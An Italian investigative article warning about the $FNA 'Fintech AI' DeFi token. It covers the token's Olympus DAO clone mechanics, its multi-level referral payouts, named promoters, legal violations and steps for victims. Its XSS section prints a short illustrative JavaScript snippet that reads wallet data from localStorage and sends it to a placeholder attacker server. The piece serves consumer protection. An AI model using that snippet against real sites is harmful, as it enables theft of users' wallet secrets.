Fintech AI ($FNA): Anatomia di una Truffa DeFi. Dal White Paper al Wallet Svuotato.

Il Copione Che si Ripete

C'è uno schema che chi lavora nel settore riconosce a colpo d'occhio. Cambiano i nomi, cambia la grafica, cambiano le buzzword oggi "AI", domani "quantum", dopodomani chissà ma la struttura è sempre la stessa. Un token con rendimenti impossibili, una community che si auto-alimenta, un white paper pieno di termini tecnici presi a prestito da progetti legittimi, e i soldi degli ultimi arrivati che pagano i guadagni dei primi.

$FNA di Fintech AI è uno di questi. Solo che questa volta è costruito in Italia, è stato lanciato a Roma nell'aprile 2025 davanti a 200 persone, e i suoi promotori hanno già alle spalle un curriculum di truffette precedenti. Analizziamo tutto contratto, meccanismo, identità, e la ciliegina avvelenata che nessun altro ha ancora spiegato bene in italiano.

Chi Sono e Dove Operano

Il sito ufficiale è fintechai.finance. La documentazione tecnica vive su fintech-ai.gitbook.io/fna. Il token gira su BNB Smart Chain (BSC) all'indirizzo:

0x08332a515cb2a57884176e887b682e7da2eb114e

Il creatore del contratto è l'indirizzo anonimo 0x4e4675...c6a8370e. Nessun nome, nessuna ragione sociale registrata, nessuna sede legale verificabile. Il white paper cita vagamente un "team a Stoccarda" senza fornire né partita IVA tedesca né numero di registro societario. Una società che non esiste sulla carta non può essere citata in giudizio, non può ricevere un provvedimento cautelare, non può essere raggiunta da un'autorità di vigilanza. Non è una dimenticanza amministrativa è architettura.

I Volti Pubblicamente Identificati

Raffaele Miccichè si è presentato come CMO per l'area europea nel lancio romano del 25 aprile 2025, davanti a oltre 200 persone, in un evento documentato con comunicato stampa ufficiale pubblicato su Medium da Fintech AI stessa. Ha tenuto il keynote, si è definito "veterano dei mercati finanziari europei" e ha invitato pubblicamente a fare staking. Non è un'informazione riservata: è materiale promozionale che lui stesso ha autorizzato e pubblicato.

Risae Kin viene presentato come CTO e "architetto visionario" del protocollo. Non esiste nessuna presenza professionale verificabile su LinkedIn, GitHub, o qualsiasi altra piattaforma al di fuori dei comunicati stampa di Fintech AI. Nessun repository di codice pubblico, nessuna conferenza tecnica, nessun paper accademico. Con ogni probabilità è uno pseudonimo una pratica comune nei progetti che pianificano l'uscita rapida.

I Promotori Già Noti alle Cronache

L'analisi investigativa pubblicata da Decripto.org testata giornalistica specializzata in analisi blockchain ha identificato tra i promotori italiani del progetto Fabrizio Gambini e Maurizio Rauso (conosciuto nell'ambiente come "Maury") come gli stessi nominativi già associati alla promozione di Daoversal, piattaforma di "ecologia sociale" che prometteva rendimenti dello 0,6% giornaliero e successivamente smascherata come schema non sostenibile, e di HyperVerse, progetto internazionale anch'esso oggetto di analisi critiche e denunce in diversi paesi.

Il pattern è identico in tutti e tre i casi: evento di lancio con sala affollata, linguaggio emozionale sulla "rivoluzione finanziaria", promesse di rendimenti passivi automatici, sistema referral per allargare la base, e infine quando i nuovi ingressi rallentano, collasso. Solo il nome cambia. La struttura è la stessa.

Il Modello: Clone di Olympus DAO Cos'è e Perché È Pericoloso

Per capire $FNA bisogna capire da dove viene. Non è un'invenzione originale. È un fork una copia di Olympus DAO (OHM), il progetto DeFi 2.0 che esplose nel 2021 con APY del 7.000-8.000% e poi crollò del 93% dal suo massimo storico.

Il meccanismo originale fu genuinamente innovativo sul piano teorico: staking + bonding + treasury-owned liquidity. Ma il problema era ed è strutturale. Ogni progetto che lo ha copiato senza risolvere i difetti fondamentali ha fatto la stessa fine: una parabola di crescita rapida seguita da un collasso altrettanto rapido.

$FNA è esattamente questo: Olympus DAO su BSC, senza le correzioni, con APY che al momento della stesura di questo articolo oscillava tra il 682% e il 938%. Come funziona ogni singolo ingranaggio di questa macchina, lo vediamo ora.

Il Meccanismo in Dettaglio: Come Funziona la Macchina

1. Il Token e la Supply Illimitata

$FNA non ha un'offerta massima fissa. Il white paper lo dichiara esplicitamente: "il modello di emissione su richiesta senza una fornitura massima fissa." L'emissione viene regolata "algoritmicamente" il che significa che chi controlla il protocollo può creare nuovi token ogni volta che vuole.

La supply attuale è di circa 270.000 token. Con un APY del 700%, tra 12 mesi dovrebbero esisterne quasi 2 milioni. Ogni nuovo token coniato diluisce il valore di quelli esistenti. L'APY altissimo non è un rendimento reale: è inflazione interna travestita da guadagno. Ti danno più token, ma ogni token vale sempre meno.

2. Lo Staking e il Rebase

Il meccanismo centrale. Chi fa staking deposita $FNA e riceve in cambio sFNA in rapporto 1:1. sFNA è il token di rappresentanza della posizione in staking non ha altra funzione.

Ogni 6 ore avviene un rebase: il protocollo conia nuovi $FNA e li distribuisce proporzionalmente a tutti i detentori di sFNA, aumentando automaticamente i loro saldi senza che debbano fare nulla. Bello in teoria. Devastante in pratica: ogni rebase aumenta la supply totale, e ogni aumento di supply esercita pressione al ribasso sul prezzo a meno che non arrivino continuamente nuovi soldi freschi a compensare.

La regola matematica implacabile: un APY del 700% significa che l'offerta di token raddoppia circa ogni 36 giorni. Il prezzo può reggere solo se la domanda raddoppia alla stessa velocità. Quando smette di farlo e prima o poi smette sempre il prezzo collassa.

Il 74,37% della supply totale è attualmente bloccato nel contratto di staking. Questo significa che il free float reale è meno del 26%. Quando anche solo una parte di questo 74% inizia a uscire, non c'è abbastanza liquidità nel pool per assorbirla senza un crollo verticale del prezzo.

3. Il Bonding: Comprare $FNA con Uno Sconto

Oltre allo staking, il protocollo offre il bonding: gli utenti vendono token LP (coppie di liquidità $FNA-USDT) o direttamente USDT al protocollo in cambio di $FNA scontati, con un periodo di vesting di 5 giorni.

L'obiettivo dichiarato è fare in modo che sia il protocollo stesso non gli utenti a detenere la liquidità (la cosiddetta "protocol-owned liquidity"). Funziona così:

1. L'utente compra un'obbligazione versando USDT alla treasury.

2. La treasury gli promette $FNA scontati, sbloccati dopo 5 giorni.

3. Quell'USDT va nelle riserve del protocollo.

Il meccanismo serve a nutrire la treasury e la treasury serve a giustificare la coniazione di nuovi token. Il Risk-Free Value (RFV) è la metrica che misura quanti USDT coprono ogni $FNA coniato. In teoria, ogni $FNA dovrebbe essere coperto da 1 USDT in treasury. In pratica, questa copertura regge solo finché la treasury cresce e la treasury cresce solo se continuano ad arrivare nuovi compratori di obbligazioni.

4. Il Network Marketing Codificato nello Smart Contract

Sezione 7.6 del white paper: il Contratto dell'Algoritmo di Contributo. Il nome è scelto apposta per non far capire di cosa si tratta. Di cosa si tratta: un piano di compensazione multi-livello upline, downline, percentuali che scorrono verso l'alto implementato direttamente nello smart contract. Non è un programma referral accessorio. È la colonna vertebrale economica dell'intero sistema.

Come funziona il reclutamento a livelli

Livello 1: Referral diretto: porti qualcuno a fare staking → guadagni il 10% delle sue ricompense da rebase a ogni ciclo, per tutto il tempo in cui quella persona rimane nel sistema. Non una tantum: ogni 6 ore, indefinitamente.

Livello 2 e oltre La rete sotto di te: il tuo "punteggio di contributo" non dipende solo da chi hai portato tu direttamente. La formula è:

M = (Sin(Qmax) + ΣQi) * 3

Dove Qi è il "potere" di ogni nodo della tua sotto-comunità, pesato con 0.9^(n-1) in base alla distanza dal tuo nodo. Tradotto senza algebra: più è grande la rete che si genera sotto di te incluse le persone portate dai tuoi referral, e dai referral dei tuoi referral più alto è il tuo punteggio e più ricompense ricevi. Chi è entrato per primo con la rete più grande guadagna sistematicamente di più di chi è entrato dopo, indipendentemente dal proprio staking personale.

Questo è upline/downline. Esattamente come Herbalife, Amway, e ogni altro MLM che abbia mai visto. (ma loro sono leciti e legali)

Il 75% di tutto ciò che il protocollo emette ogni giorno va in questo pool di contributo. Tre quarti delle emissioni giornaliere non vanno agli staker in base ai loro token vanno a chi ha costruito la rete più grande.

La differenza tra un referral legittimo e un MLM

Un programma referral legittimo ti dà un bonus una tantum per aver portato un amico. Amazon lo fa. Coinbase lo fa. Finisce lì.

Un MLM è strutturalmente diverso: i guadagni dipendono in modo continuativo dalla performance economica della rete costruita sotto di te. È esattamente questo che fa $FNA. Il coefficiente 0.9^(n-1) garantisce che i nodi più vicini alla radice i primi entrati, quelli che hanno avviato il reclutamento prendano sempre la fetta più grande, in modo automatico e permanente.

Il "Ciclo di Contributo": la trappola nella trappola

C'è un dettaglio nel white paper che quasi nessuno nota. Si chiama "Ciclo di Contributo":

Hai guadagnato abbastanza dalla tua rete? Bene. Adesso per continuare a ricevere quei guadagni devi distruggere token reali token che hai comprato con soldi veri, o che potresti altrimenti vendere. Il sistema ti estrae ulteriore valore nel momento stesso in cui stai "guadagnando bene". È retention forzata mascherata da meccanica di sostenibilità.

Il ruolo degli eventi fisici: reclutamento in sala

Gli eventi dal vivo come quello di Roma del 25 aprile 2025 con 200 persone, con Miccichè sul palco a fare il keynote non sono marketing tradizionale. Nella struttura MLM, gli eventi fisici svolgono una funzione precisa: costruire la rete di reclutatori di persona. Chi partecipa torna a casa con la propria upline già identificata (chi li ha portati all'evento), il materiale per costruire la propria downline, e una carica emotiva il palco, la folla, i discorsi sulla "rivoluzione finanziaria" che abbassa le difese critiche e aumenta la propensione al reclutamento immediato.

È illegale in Italia?

La legge italiana distingue nettamente due cose:

Network marketing legittimo (D.Lgs. 114/1998): ammesso quando esiste un prodotto o servizio reale venduto a clienti finali esterni alla rete, e quando i guadagni derivano prevalentemente da quella vendita reale non dal reclutamento.

Schema piramidale illegale (art. 23 D.Lgs. 70/2003 e art. 61 Codice del Consumo): vietato quando i guadagni derivano principalmente dal reclutamento di nuovi partecipanti e non da attività economica reale verso l'esterno.

In $FNA non esiste nessun prodotto venduto a consumatori finali esterni alla rete. L'unica attività è comprare token, metterli in staking, e portare altri a fare lo stesso. Le ricompense derivano interamente dalla crescita della rete di staker. Nessuna attività economica reale al di fuori del circolo chiuso.

Questo è lo schema piramidale nella sua forma più pulita. Il fatto che sia implementato su blockchain con una formula matematica non cambia la sostanza giuridica e non lo rende meno sanzionabile.

5. Il Vesting Accelerato con wBNB Burn

Per sbloccare le ricompense prima della scadenza naturale (180 giorni), il protocollo permette di bruciare $wBNB Wrapped BNB, acquistabile tramite il sito stesso. La tabella è la seguente:

Questo è un meccanismo per estrarre ulteriore valore dagli utenti: se vuoi i tuoi soldi prima, devi bruciare un asset reale (BNB ha valore di mercato). Chi guadagna da questa combustione? Il protocollo.

Il Contratto: I Problemi Tecnici Critici

Proxy Contract = Contratto Modificabile Senza Preavviso

Questo è il punto tecnico più pericoloso di tutti, e pochi utenti retail lo capiscono.

Un proxy contract è un'architettura in cui il contratto che interagisce con gli utenti è separato dal contratto che contiene la logica effettiva. Il proxy "delega" le chiamate all'implementazione. Il risultato pratico: il team può sostituire la logica del contratto in qualsiasi momento, senza necessità di notifica, senza che tu possa impedirlo.

Immagina di affittare una cassaforte. Il contratto che hai firmato dice che la cassaforte è tua. Ma il proprietario del palazzo può cambiare i muri, spostare la cassaforte, o addirittura rimuoverla e il tuo contratto originale non lo vieta.

Questo è confermato da CertiK Skynet, che nel suo monitoraggio riporta esplicitamente la presenza di:

• Proxy Contract ✗

• External Call Risk ✗

• Mint Function ✗

  
  

La Mint Function senza supply cap + proxy contract modificabile = chi controlla l'admin key può, tecnicamente, creare token a piacimento e aggiornare il contratto per fare ciò che vuole.

Il Punteggio CertiK: 61,53/100 Non È Una Garanzia

Fintech AI usa il logo CertiK come scudo di credibilità. Ma bisogna capire cosa audita CertiK e cosa non audita.

CertiK audita il codice verifica che non ci siano bug noti o vulnerabilità nell'implementazione attuale. Non audita il modello di business. Non valuta se l'economia del token è sostenibile. Non valuta se i fondatori sono affidabili. Non valuta se lo schema è strutturalmente una truffa.

Un punteggio di 61,53/100 con flag espliciti su centralizzazione e minting rights non è un bollino di sicurezza è una lista di problemi irrisolti.

La Bomba: Il Sito Ti Ruba le Chiavi Mentre Lo Guardi

Questa è la parte che separa $FNA da un semplice schema Ponzi e lo porta nella categoria del furto attivo e tecnico di wallet. Non parliamo di qualcuno che ti convince a inviare i fondi. Parliamo di un sistema che può svuotarti il wallet mentre sei connesso al sito, senza che tu faccia nulla di sbagliato.

Prima di tutto: cos'è la seed phrase e perché è tutto

La seed phrase, quella sequenza di 12 o 24 parole che ti viene mostrata quando crei un wallet non è una password. È la radice matematica da cui vengono generate tutte le tue chiavi private, per tutte le blockchain, per sempre. Chi ha la tua seed phrase ha tutto quello che hai. Può importare il tuo wallet su qualsiasi dispositivo, in qualsiasi momento, e svuotarlo completamente. Non c'è modo di recuperare i fondi, non c'è "blocco del conto", non c'è banca che intervenga.

Regola numero uno della sicurezza crypto, quella che ripetiamo fino alla nausea: la seed phrase non deve mai uscire dal tuo foglio di carta o dal tuo hardware wallet. Non la digiti su un sito. Non la incolli in nessun campo. Non la conservi in un file sul computer. Mai.

Il localStorage: la cassaforte senza serratura

Il browser, Chrome, Firefox, Safari, qualsiasi, ha una zona di memoria locale chiamata localStorage. È pensata per salvare preferenze banali: la lingua scelta, il tema chiaro/scuro, l'ultima scheda aperta. È persistente (rimane anche dopo aver chiuso il browser), è in chiaro (non è cifrata in nessun modo nativo), ed è accessibile da qualsiasi script JavaScript che gira sulla stessa pagina.

Quest'ultimo punto è quello che conta. Qualsiasi codice JavaScript sulla pagina può fare questo:

javascript

localStorage.getItem('chiave_che_mi_interessa')

e leggere quello che c'è dentro. Senza autorizzazione, senza password, senza avvisi.

Cosa ha trovato l'analisi tecnica

L'analisi del sito fintechai.finance ha rilevato due elementi critici salvati nel localStorage in chiaro:

1. Dati della seed phrase / chiave privata Il sito costruito in React, come la maggior parte delle DApp moderne gestisce la connessione al wallet in modo che informazioni derivate dalla chiave privata finiscano nel localStorage non cifrato. Tradotto: il materiale crittografico che dovrebbe restare blindato nel tuo wallet fisico o nell'estensione del browser, in questo caso transita e viene memorizzato in una zona accessibile a chiunque riesca a eseguire codice sulla pagina.

2. Il WalletLink session token Oltre alle chiavi, nel localStorage compare anche un token di sessione WalletLink il protocollo usato per connettere wallet mobile al browser (lo stesso usato da Coinbase Wallet). Questo token permette di ripristinare la connessione tra browser e wallet senza dover reinserire la password o la seed phrase. Per un attaccante, è ancora meglio della chiave stessa: gli permette di agire in modo persistente sulla sessione attiva, anche a distanza.

Come viene sfruttato: l'attacco XSS

XSS (Cross-Site Scripting) è uno degli attacchi informatici più comuni al mondo da anni nella top 10 delle vulnerabilità OWASP. Funziona così: l'attaccante trova un modo per iniettare codice JavaScript malevolo in una pagina web legittima. Questo codice viene eseguito nel browser della vittima, con gli stessi permessi della pagina originale, e può leggere tutto quello che è nel localStorage.

I vettori di iniezione sono molteplici:

• Script di terze parti qualsiasi libreria esterna (analytics, chat, banner pubblicitari) inclusa nel sito può essere compromessa o sostituita

• Estensioni del browser malevole un'estensione installata dall'utente può iniettare codice in qualsiasi pagina visitata

• CDN compromesse se il sito carica librerie da server esterni, un attacco alla CDN si propaga a tutti gli utenti

• Accesso fisico al computer chiunque apra il browser sulla stessa macchina può leggere il localStorage in pochi secondi dalla console degli sviluppatori (F12 → Console → localStorage)

• 
  

Il codice dell'attacco, nella sua forma più semplice, è banale:

javascript

// Script iniettato via XSS — 3 righe per svuotare un wallet
const seed = localStorage.getItem('wallet_data');
fetch('https://server-attaccante.com/steal', { method: 'POST', body: seed });

Fatto. Wallet svuotato. Irreversibile.

Perché questo non è un bug ma è una scelta consapevole

In qualsiasi DeFi protocol costruito correttamente, le chiavi private non abbandonano mai il wallet dell'utente. MetaMask, Trust Wallet, Ledger, Trezor, tutti usano lo stesso principio: il sito chiede di firmare una transazione, il wallet firma internamente, e invia al sito solo la firma mai la chiave che l'ha generata. È come usare un timbro: consegni il documento timbrato, non il timbro.

Fintech AI fa il contrario. Fa transitare materiale crittografico sensibile attraverso il DOM del browser e lo lascia seduto in chiaro nel localStorage. Questo non è l'errore di uno sviluppatore junior che non sapeva cosa stava facendo. Ogni corso base di sicurezza web insegna che il localStorage non va usato per dati sensibili è documentato, è noto, è nei tutorial da oltre un decennio.

È una scelta progettuale deliberata. E le scelte hanno un perché.

Le conseguenze pratiche: chi è a rischio adesso

Sono potenzialmente a rischio:

• Chiunque abbia connesso il proprio wallet al sito fintechai.finance in qualsiasi momento

• Chiunque abbia importato la propria seed phrase direttamente nel sito invece di usare un'estensione wallet esterna

• Chiunque abbia interagito con la DApp su un computer condiviso o non sicuro

• Chiunque abbia estensioni del browser non verificate installate

Il rischio non è teorico e futuro. È presente e attivo per chiunque si trovi in queste condizioni. Un wallet svuotato via XSS avviene in secondi, non lascia tracce comprensibili alla vittima, e essendo una transazione blockchain legittima firmata con le chiavi reali — è irreversibile.

Il Volano Economico: Perché Regge Ora e Perché Crollerà

Il white paper descrive un "volano economico" con questo ciclo:

APY alto → più staking → prezzo su → 
più bonding → treasury cresce → più APY → ...

Sembra autosufficiente. Non lo è. Ogni anello del ciclo dipende da un presupposto: che continuino ad arrivare nuovi capitali dall'esterno.

Ecco la realtà:

• Le ricompense da staking vengono pagate in $FNA coniati ex novo.

• Ogni $FNA coniato dovrebbe essere coperto da 1 USDT in treasury (il RFV).

• Quell'USDT arriva dalle vendite di obbligazioni e dagli acquisti di nuovi partecipanti.

• Se i nuovi ingressi rallentano, la treasury smette di crescere.

• Se la treasury smette di crescere, non si possono coniare nuovi $FNA.

• Se non si coniano nuovi $FNA, le ricompense si azzerano.

• Se le ricompense si azzerano, chi è in staking vende.

• Se tutti vendono insieme, il pool di liquidità da 3 milioni di USDT viene prosciugato in ore.

Il meccanismo del vesting da 5-180 giorni è l'unica cosa che rallenta questo processo ma non lo previene.

In Olympus DAO, il progetto originale di cui $FNA è un clone, questo ciclo ha portato a un crollo del 93% dal massimo storico, con migliaia di holder rimasti con token privi di valore.

L'Assenza di Termini e Condizioni: anche questa una scelta consapevole.

Non trovi i T&C perché non esistono. È una scelta deliberata.

Senza termini e condizioni scritti e firmabili:

• Non esiste nessun contratto legalmente vincolante tra l'utente e il protocollo.

• Non hai nessun diritto esigibile in caso di perdita dei fondi.

• Non esiste nessuna giurisdizione dichiarata — quindi non sai nemmeno a quale tribunale rivolgerti.

• Non c'è nessun meccanismo di rimborso, nessun recesso, nessuna tutela del consumatore applicabile.

In Italia, chiunque raccolga capitali dal pubblico con promesse di rendimento senza autorizzazione è soggetto all'art. 166 del Testo Unico della Finanza (D.Lgs. 58/1998) esercizio abusivo di attività finanziaria. L'assenza di T&C non li protegge dalla legge, ma rende semplicemente impossibile per chi perde fare valere qualsiasi diritto civilistico davanti a un giudice.

La struttura è progettata per lasciare chi perde senza appigli.

Fuorilegge anche sulla Privacy: Le Violazioni GDPR

Il quadro delle illegalità non si ferma alla finanza. Fintech AI opera in piena violazione del Regolamento UE 2016/679 (GDPR), applicabile direttamente in Italia, su più fronti simultanei.

Nessuna Privacy Policy Violazione dell'Art. 13-14 GDPR

Qualsiasi sito che raccoglie dati personali degli utenti è obbligato per legge a fornire un'informativa chiara e accessibile prima che l'utente interagisca con il servizio. Un sito che gestisce wallet crypto raccoglie necessariamente indirizzi blockchain, indirizzi IP, dati di sessione, e — nel caso di Fintech AI molto di più.

Fintech AI non ha una Privacy Policy pubblica. Non identificano il titolare del trattamento. Non dichiarano quali dati raccolgono, per quanto tempo li conservano, se li trasferiscono fuori dall'Unione Europea cosa quasi certa, considerato che l'infrastruttura è su BSC/Binance con server probabilmente fuori UE. Non indicano la base giuridica del trattamento. Non informano l'utente dei propri diritti (accesso, cancellazione, portabilità, opposizione).

Questa non è una dimenticanza. È una violazione automatica e documentabile del GDPR.

Art. 5 GDPR Principio di Integrità e Riservatezza

Il GDPR impone che i dati personali vengano trattati "in maniera da garantire un'adeguata sicurezza dei dati personali, compresa la protezione, mediante misure tecniche e organizzative adeguate, da trattamenti non autorizzati o illeciti."

Salvare chiavi private o seed phrase in chiaro nel localStorage del browser è la violazione più plateale immaginabile di questo principio. Non serve un perito informatico per dimostrarlo: è sufficiente aprire gli strumenti sviluppatore del browser e guardare.

Art. 25 GDPR Privacy by Design e by Default

Il titolare del trattamento è obbligato a implementare misure di protezione fin dalla progettazione del sistema. Non è un'opzione facoltativa, non è qualcosa che si aggiunge dopo. È un requisito strutturale.

Un frontend che espone dati sensibili in chiaro è la negazione esatta di questo principio. Dimostra che nessuno, in fase di sviluppo, ha mai considerato la protezione dei dati come un requisito. O peggio, qualcuno l'ha considerata e ha scelto di non implementarla.

Art. 32 GDPR Sicurezza del Trattamento

Obbligo esplicito di adottare misure tecniche adeguate al rischio, tra cui espressamente la cifratura dei dati personali. La sanzione per violazione dell'art. 32 arriva fino a 10 milioni di euro o il 2% del fatturato mondiale annuo con facoltà del Garante Privacy di intervenire anche d'ufficio, senza necessità di una denuncia formale.

Art. 33-34 GDPR Obbligo di Notifica delle Violazioni

Se i dati degli utenti italiani sono stati esposti e tecnicamente lo sono stati ogni volta che qualcuno ha connesso il wallet al sito il titolare del trattamento aveva l'obbligo di notificare la violazione al Garante Privacy entro 72 ore dalla scoperta. Ovviamente non l'hanno fatto: non si sono mai nemmeno identificati come titolari del trattamento.

Cookie Banner Probabilmente Assente o Non Conforme

Un sito React moderno utilizza quasi certamente script di analytics, pixel social, o cookie di terze parti. Senza un banner conforme alle Linee Guida del Garante Privacy del 2021 (che richiedono il consenso preventivo e granulare), stanno violando anche la normativa sui cookie.

A Chi Segnalare per le Violazioni Privacy

• Garante per la Protezione dei Dati Personali → garante.it → sezione "Segnalazioni e reclami". Chiunque abbia connesso il wallet al sito è un interessato ai sensi del GDPR e ha pieno titolo per presentare reclamo direttamente, senza bisogno di un avvocato.

  
  

La Mappa Completa delle Red Flag

Come Riconoscere il Clone OHM in Futuro

Questa non è l'ultima volta che vedrete questo schema. La struttura Olympus-fork viene riciclata continuamente con nuovi nomi. I segnali che permettono di riconoscerla a colpo d'occhio:

1. APY a tre cifre o più. Qualsiasi APY sopra il 20-30% sostenuto nel lungo periodo è matematicamente impossibile senza un afflusso continuo di nuovi capitali. Se vedete 200%, 700%, 8.000% è sempre lo stesso schema.

2. Staking + bonding + rebase. Se un progetto usa tutti e tre questi elementi insieme, è un Olympus fork. Non c'è eccezione.

3. "Protocol-owned liquidity" come punto di forza. Legittimo come concetto, sistematicamente abusato dai fork.

4. Sistema referral con percentuali multi-livello. La DeFi vera non ha bisogno di network marketing. Se il protocollo ti paga per portare altri, stai guardando una piramide.

5. White paper con terminologia accademica ma senza codice sorgente verificabile. Il white paper di $FNA cita la teoria dei giochi e il Dilemma del Prigioniero per giustificare "perché non vendere è razionale." È retorica, non matematica.

6. "AI" nel nome senza nessun componente AI reale. Nel meccanismo di $FNA non c'è nessun algoritmo di intelligenza artificiale. C'è uno smart contract BSC standard. La parola "AI" è decoration.

Se Sei Già Dentro: Cosa Fare

Se hai già acquistato $FNA o hai connesso il tuo wallet al sito di Fintech AI, agisci immediatamente:

1. Non connettere più il wallet al sito. Ogni connessione è una potenziale esposizione.

2. Crea un nuovo wallet. Genera un nuovo seed phrase su un dispositivo pulito (preferibilmente offline). Trasferisci lì tutti i tuoi asset, incluse le altre criptovalute.

3. Revoca le approvazioni. Vai su revoke.cash o bscscan.com/tokenapprovalchecker e revoca tutte le approvazioni che hai dato al contratto di Fintech AI.

4. Non aggiungere altro capitale. Se sei in perdita, la reazione istintiva è mediare il prezzo acquistando altri token. Con questo schema non funziona: stai solo aumentando l'esposizione.

5. Documenta tutto. Screenshot delle transazioni, degli importi, delle comunicazioni ricevute dai promotori (messaggi Telegram, email, materiale degli eventi). Ogni elemento è potenzialmente utile per una denuncia.

6. Segnala alle autorità competenti — tutte:

• CONSOB → consob.it → form segnalazione abusivismo finanziario (violazione TUF art. 166)

• AGCM (Autorità Garante della Concorrenza e del Mercato) → agcm.it → per la struttura piramidale ai sensi dell'art. 61 Codice del Consumo — è proprio l'AGCM a sanzionare gli schemi piramidali in Italia

• Garante Privacy → garante.it → segnalazioni e reclami (violazioni GDPR, dati in chiaro, assenza Privacy Policy)

• Banca d'Italia → se ritieni che il meccanismo di bonding configuri raccolta abusiva di risparmio

• Polizia Postale → commissariatodips.it → sezione truffe online (truffa aggravata art. 640 c.p.)

  
  

Con i nomi pubblicamente identificati e i precedenti documentati su Daoversal e HyperVerse, una denuncia penale è concretamente percorribile. Più segnalazioni convergenti arrivano alle stesse autorità, più velocemente si attivano.

Conclusione

$FNA non è un errore di valutazione né un progetto rischioso ma legittimo. È uno schema progettato sistematicamente per trasferire valore dagli ultimi arrivati ai primi con l'aggiunta, unica nel panorama italiano recente, di un meccanismo tecnico che espone direttamente le chiavi private degli utenti.

Il fatto che esista un audit CertiK, che il token sia listato su PancakeSwap, che abbia migliaia di holder, che il prezzo sia relativamente stabile in un "corridoio" tutto questo non è garanzia di legittimità. È il risultato del meccanismo stesso: il prezzo regge finché i soldi entrano. Quando smettono, non c'è nessun pavimento.

Bitcoin ti dà sovranità finanziaria perché il suo valore non dipende da nessuno che continui a versare soldi nel sistema. $FNA è l'opposto esatto: dipende interamente dalla fiducia e dalla continua partecipazione di chi viene dopo di te.

In questo settore, "troppo bello per essere vero" non è una sensazione. È un'analisi.

International Crypto Academy corsibitcoin.it Per segnalazioni di truffe o richieste di analisi forensi: Se hai perso fondi in schemi simili, possiamo aiutarti a documentare il caso per le autorità competenti.